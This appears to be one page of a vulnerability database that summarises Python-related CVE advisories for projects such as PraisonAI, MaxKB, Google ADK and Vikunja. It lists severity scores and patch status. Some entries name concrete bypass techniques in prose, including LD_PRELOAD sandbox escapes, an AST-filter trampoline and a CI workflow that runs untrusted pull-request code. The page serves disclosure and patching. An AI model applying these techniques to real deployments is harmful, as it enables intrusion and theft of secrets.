Untrusted DLL search path vulnerability in Yubico libfido2 before 1.17.0, python-fido2 before 2.2.0, and yubikey-manager before 5.9.1 allows local attackers to achieve privilege escalation or code execution by placing a malicious DLL in a directory searched before the legitimate library location. The vulnerability requires local access and high complexity conditions but affects three widely-used FIDO2 authentication libraries; no public exploit code identified at time of analysis.

Information Disclosure Python
NVD
EPSS 0% CVSS 8.8
HIGH This Week

OWASP BLT is a QA testing and vulnerability disclosure platform that encompasses websites, apps, git repositories, and more. Versions prior to 2.1.1 contain an RCE vulnerability in the .github/workflows/regenerate-migrations.yml workflow. The workflow uses the pull_request_target trigger to run with full GITHUB_TOKEN write permissions, copies attacker-controlled files from untrusted pull requests into the trusted runner workspace via git show, and then executes python manage.py makemigrations, which imports Django model modules including attacker-controlled website/models.py at runtime. Any module-level Python code in the attacker's models.py is executed during import, enabling arbitrary code execution in the privileged CI environment with access to GITHUB_TOKEN and repository secrets. The attack is triggerable by any external contributor who can open a pull request, provided a maintainer applies the regenerate-migrations label, potentially leading to secret exfiltration, repository compromise, and supply chain attacks. A patch for this issue is expected to be released in version 2.1.1.

Code Injection Python RCE
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Remote code execution in giskard-checks through server-side template injection (SSTI) in the ConformityCheck class allows arbitrary Python code execution when the rule parameter is processed via unsandboxed Jinja2 template rendering. Affected versions prior to 1.0.2b1 silently interpret rule strings as Jinja2 templates, enabling attackers with write access to check definitions or configuration files to inject malicious template expressions that execute during test suite execution. Exploitation requires local file write access and subsequent developer execution of the test suite, but the implicit template evaluation increases risk when untrusted check definitions are integrated from shared projects or external sources.

RCE Ssti Python
NVD GitHub VulDB
EPSS 0% CVSS 1.0
LOW PATCH Monitor

Denial of service in giskard-checks RegexMatching check via unguarded regex pattern matching allows local attackers with write access to check definitions to trigger catastrophic backtracking in Python's re.search() function, causing process hangs and disrupting CI/CD pipelines or automated test execution.

Denial Of Service Python
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

OpenStack Keystone's LDAP identity backend grants authentication access to disabled user accounts due to improper string-to-boolean conversion logic. Versions 8.0.0 through 28.0.0 fail to convert LDAP-disabled status into boolean values when user_enabled_invert is False (default), causing disabled accounts to authenticate as enabled. This affects all LDAP-backed Keystone deployments without specific configuration overrides. CVSS 7.7 with changed scope (S:C) indicates potential cross-tenant privilege issues. EPSS data not available; no public exploit identified at time of analysis, though the logic flaw is straightforward to trigger with valid low-privilege credentials.

Information Disclosure Memory Corruption Python +1
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Memory corruption in Python's asyncio introspection and profiling.sampling modules (3.14-3.15) allows a local attacker with high privileges to read and write arbitrary memory in a connected privileged Python process via remote debugging. Exploitation requires persistent, repeated connections and high tolerance for crashes due to ASLR; no public exploit code has been identified. SSVC framework rates technical impact as total, but exploitation remains none-indicating low real-world priority despite severe capability impact.

Buffer Overflow Stack Overflow Python
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Arbitrary command and code execution in PraisonAI's workflow engine (versions <4.5.139) and praisonaiagents (<1.5.140) allows remote unauthenticated attackers to execute shell commands and Python code through malicious YAML workflow files. The vulnerability stems from unsafe processing of 'run:', 'script:', and 'python:' directives in job-type workflows without validation or sandboxing. With a critical CVSS score of 9.8 and network-accessible attack vector requiring no privileges or user interac

RCE Command Injection Python
NVD GitHub
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Arbitrary Python code execution in PraisonAI ≤4.5.138 occurs when malicious tools.py files are automatically imported from the current working directory without validation. Attackers placing a crafted tools.py in shared projects, cloned repositories, or writable workspaces achieve immediate code execution with full process privileges upon PraisonAI startup. EPSS data not available, but the local attack vector (AV:L) requiring no privileges (PR:N) or user interaction (UI:N) enables exploitation through supply chain and workspace poisoning attacks. No public exploit identified at time of analysis, though the vulnerability is trivial to exploit given the straightforward code injection mechanism.

Code Injection RCE Python
NVD GitHub
EPSS 0% CVSS 3.1
LOW PATCH Monitor

MaxKB versions 2.7.1 and below allow authenticated users to spoof tool execution results by exploiting Python frame introspection to extract the wrapper's UUID from bytecode, then writing forged output directly to file descriptor 1 to bypass stdout redirection and terminate the wrapper process before legitimate output is generated, causing the service to trust the attacker-controlled response. This integrity bypass requires prior authentication and local/network access but enables attackers to manipulate AI tool results without detection. The vulnerability has been patched in version 2.8.0.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated attackers with workspace privileges to execute arbitrary code by exploiting a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to invoke raw system calls and bypassing the LD_PRELOAD-based sandbox.so module through the unblocked pkey_mprotect syscall, attackers can achieve remote code execution, enabling network exfiltration and container compromise. This vulnerability is confirmed fixed in version 2.8.0, and no public exploit code has been identified at time of analysis.

RCE Python
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated users with tool execution privileges to bypass the LD_PRELOAD-based sandbox via the env command, enabling unrestricted remote code execution and network access. The vulnerability stems from a patch that permitted execution of /usr/bin/env, which attackers can exploit using env -i to clear environment variables and drop the sandbox.so hook before spawning a native Python subprocess. Vendor-released patch: version 2.8.0.

RCE Python
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL POC PATCH HOSTED Monitor

Remote code execution in Google Agent Development Kit (ADK) versions 1.7.0-1.28.0 and 2.0.0a1 allows unauthenticated remote attackers to execute arbitrary code on ADK server instances via combined code injection and missing authentication flaws. Affects Python OSS deployments, Cloud Run, and GKE environments. CVSS 9.3 critical severity with proof-of-concept code available (CVSS:4.0 E:P). No CISA KEV listing indicates no confirmed widespread exploitation at time of analysis, though the authentication bypass combined with RCE presents extreme risk for exposed instances.

Authentication Bypass Google RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Path traversal (Zip Slip) in gramps-web-api media archive import allows authenticated owner-privileged users to write arbitrary files outside intended directories via malicious ZIP archives. Exploitation requires owner-level access and enables cross-tree data corruption in multi-tree SQLite deployments or config file overwrite in volume-mounted configurations. Postgres+S3 deployments limit impact to ephemeral container storage. No public exploit identified at time of analysis.

PostgreSQL Python Path Traversal +1
NVD GitHub
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

PraisonAI before version 4.5.128 exposes sensitive environment variables to untrusted subprocess commands executed through its MCP (Model Context Protocol) integration, enabling credential theft and supply chain attacks when third-party tools like npx packages are invoked. An unauthenticated local attacker with user interaction can trigger MCP commands that inherit the parent process environment, gaining access to API keys, authentication tokens, and database credentials without the knowledge of developers using PraisonAI. The vulnerability is fixed in version 4.5.128.

Python Information Disclosure RCE
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Arbitrary code execution in PraisonAI multi-agent system (<4.5.128) via Python sandbox escape. Incomplete AST attribute filtering allows type.__getattribute__ trampoline to bypass restrictions on __subclasses__, __globals__, and __bases__, enabling untrusted agent code to break containment. Attack requires local access and user interaction to execute malicious code. No public exploit identified at time of analysis.

RCE Python Code Injection
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Vikunja's file import endpoint bypasses configured maximum file size limits by trusting an attacker-controlled Size field in import metadata rather than validating actual decompressed file content. Authenticated users can upload small compressed zip files (e.g., ~25KB) containing files up to 25MB or larger, exhausting server storage and causing denial of service across all users. The vulnerability affects Vikunja v2.2.2 and earlier versions; a vendor-released patch is available in v2.3.0.

Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 4.1
MEDIUM PATCH This Month

CalDAV output generator in Vikunja allows authenticated users to inject arbitrary iCalendar properties via CRLF characters in task titles, bypassing RFC 5545 TEXT value escaping requirements. An attacker with project write access can craft malicious task titles that break iCalendar property boundaries, enabling injection of fake ATTACH URLs, VALARM notifications, or ORGANIZER spoofing when other users sync via CalDAV. Patch available in version 2.3.0; requires user interaction (calendar sync) to trigger on other users' clients.

RCE Python
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Vikunja task title injection in overdue email notifications allows authenticated attackers to embed phishing links and tracking pixels in legitimate SMTP emails by breaking Markdown link syntax with special characters. The vulnerability affects task notification rendering across multiple notification types in Vikunja prior to v2.3.0, where task titles are concatenated directly into Markdown without escaping, survive goldmark rendering and bluemonday sanitization (which intentionally permits <a> and <img> tags), and reach email recipients as trusted-source links within official Vikunja notifications.

XSS Python
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Denial of service in Vikunja via algorithmic complexity attack in the addRepeatIntervalToTime function allows authenticated users to exhaust server CPU and database connections by creating repeating tasks with 1-second intervals and dates far in the past (e.g., 1900), triggering billions of loop iterations that hang requests for 60+ seconds and exhaust the default 100-connection pool. CVSS 6.5 with authenticated attack vector; confirmed patched in v2.3.0.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Vikunja task authorization bypass in CalDAV allows authenticated users to read arbitrary task details from any project by knowing a task UID, bypassing REST API permission checks. The GetResource and GetResourcesByList CalDAV methods query tasks by UID without verifying the authenticated user has project access, enabling information disclosure of task titles, descriptions, due dates, and other metadata across organizational boundaries in multi-tenant deployments. Patch available in v2.3.0.

Python Authentication Bypass
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Vikunja API brute-forces TOTP codes by exploiting a database transaction rollback bug that prevents account lockout persistence. When TOTP validation fails, the login handler rolls back the database session containing the failed-attempt counter increment and account lock status, leaving the lockout mechanism non-functional while per-IP rate limiting can be bypassed via distributed attack. Unauthenticated remote attackers who possess a user's password can exhaust the 6-digit TOTP code space (only 1 million combinations) and gain unauthorized access. Patch is available as of Vikunja v2.3.0.

Python Authentication Bypass
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Vikunja API versions prior to 2.3.0 allow authenticated users to read any label metadata and creator information across projects via SQL operator precedence flaw in the hasAccessToLabel function. Any label attached to at least one task becomes readable to all authenticated users regardless of project access permissions, enabling cross-project information disclosure of label titles, descriptions, colors, and creator usernames. The vulnerability requires prior authentication (PR:L per CVSS vector) and carries low complexity attack surface with direct impact to confidentiality. No public exploit code beyond the proof-of-concept in the advisory has been identified, and vendor-released patch version 2.3.0 is available.

Python Information Disclosure Authentication Bypass
NVD GitHub
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Privilege escalation in Vikunja API (v2.2.2 and prior) allows authenticated users with Write permission on a shared project to escalate to Admin by reparenting the project under their own hierarchy. The vulnerability exploits insufficient authorization checks in project reparenting (CanWrite instead of IsAdmin), causing the recursive permission CTE to grant Admin rights. Attackers can then delete projects, remove user access, and manage sharing settings. Publicly available exploit code exists.

Python Privilege Escalation
NVD GitHub
Prev Page 7 of 25 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy